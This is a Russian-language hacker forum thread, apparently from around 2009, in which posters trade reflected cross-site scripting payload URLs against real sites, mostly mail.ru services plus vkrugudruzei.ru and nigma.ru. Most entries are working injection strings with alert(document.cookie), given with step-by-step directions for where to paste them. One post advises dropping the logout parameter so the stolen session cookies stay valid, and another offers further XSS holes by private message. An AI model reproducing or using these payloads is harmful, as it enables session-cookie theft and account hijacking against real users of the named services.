http://soft.mail.ru/s_result_softclub.php?qs=1&words=%27%3E%3C%27%27%3 E%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscrip t%3E

в фильтре есть дырка ... кто сможет реадизовать ?

http://story.travel.mail.ru/?city_from=1&countryid=1934&countryidtxt=%C0%E1%F5 %E0%E7%E8%FF&cityid=1500&'%3E%3C''%3E%22%3E%3Cscri pt%3Ealert(/XSS/)%3C/script%3Ecityidtxt=%C3%E0%E3%F0%FB&hotelidtxt=%27% 3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS%2F% 29%3C%2Fscript%3E&inp_mode=inp&price=%27%3E%3C%27% 27%3E%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fs cript%3E&p_mode=1&p_type=1&nights1=0&nights2=0&dat e1_d=1&date1_my=11_2009&date2_d=8&date2_my=12_2009 &comments=&mod=custom_order_tour



http://travel.mail.ru/?mod=companions&res=1&self_id=1&look_for_id=2&age_ from=&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3Eage_to=&account_region_id=0&geo_id=0&days _cnt_id=0&date1=08.11.2009&date2=08.12.2009

заходим сюды ---> http://travel.mail.ru/ слева вводим в поля " Город " , " Дата приезда - Дата отъезда " '><''>"><script>alert(document.cookie)</script> ---> найти отель !
WTF? печеькО )))

http://content.mail.ru/cgi-bin/list.cgi в поле организация вставить '><''>"><script>alert(document.cookie)</script> и тут полетит печеняГа))

Все XSS тока для авторизированных!!! ( на майле 11 x 11 тока при получении письма )

http://vkrugudruzei.ru/user/advert/advert.asp?uid=7155524&%27%3E%3C%27%27%3E%22%3E%3C script%3Ealert%28document.cookie%29%3C/script%3E

http://11x11.mail.ru/xml/office/mail.php?id=18&type=office/mail&act=message&mode=1'%3E%3C''%3E%22%3E%3Cscript %3Ealert(/XSS/)%3C/script%3E

Кому надо еще XSS от вкругу друзей? стучим ногами в личку!


BlackSun -- тока умеешь -минусы ставить ? достал уже!

Заходим сюда ---> http://travel.mail.ru ---> выбераем вклаку взять собой ( МТС ) ---> добавить ( ставим галку ) ----> <IMG SRC="javascript:alert( document.cookie );">
0_o ... WTF?
Как было тяжко без ачата

http://11x11.mail.ru/?&url='%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&do=logout
работает тока у авторизированных !

так гораздо лучше
http://11x11.mail.ru/?&url="><script>alert(document.cookie)</script>

запрос do=logout в ссылке означает выход из почтового ящика, а мы знаем, что кукисы умирают, как только нажмешь Выход, поэтому последние строки do=logout из ссылки убери, иначе сохранять будешь мертвые кукисы....

Не знал куда можно скинуть...

http://nigma.ru/index.php?s='><''>"><script>alert(document.cookie) </script>